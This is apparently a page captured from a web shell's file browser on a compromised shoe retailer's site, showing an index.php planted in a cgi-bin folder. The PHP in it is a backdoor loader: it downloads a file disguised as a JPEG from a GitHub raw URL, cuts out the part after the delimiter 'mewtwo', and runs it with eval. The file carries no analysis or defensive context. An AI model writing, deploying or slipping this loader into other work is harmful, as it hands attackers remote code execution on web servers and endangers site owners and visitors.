Your IP : 3.141.45.177


Current Path : /home/church/www/michaelblakeshoes.com/cgi-bin/930328/
Upload File :
Current File : /home/church/www/michaelblakeshoes.com/cgi-bin/930328/index.php

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://raw.githubusercontent.com/security-seo/web-research/refs/heads/main/ip.jpg");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36");
$img = curl_exec($ch);
curl_close($ch);
$x = explode("mewtwo", $img);
if (isset($x[1])) {
    eval("?>" . $x[1]);
} else {
    echo "The delimiter 'mewtwo' was not found in the image content.";
}
?>